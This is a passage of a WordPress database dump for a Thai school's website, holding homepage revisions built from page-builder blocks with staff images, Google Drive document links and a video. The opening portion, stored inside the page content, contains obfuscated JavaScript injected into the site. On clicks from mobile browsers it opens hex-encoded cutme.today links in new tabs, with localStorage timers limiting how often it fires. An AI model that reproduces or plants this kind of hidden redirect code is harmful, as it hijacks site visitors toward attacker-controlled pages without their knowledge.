x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:04:12','2024-08-30 02:04:12','',19,'http://watprato.ssk.in.th/?p=281',0,'revision','',0),
(282,2,'2024-08-30 09:42:37','2024-08-30 02:42:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 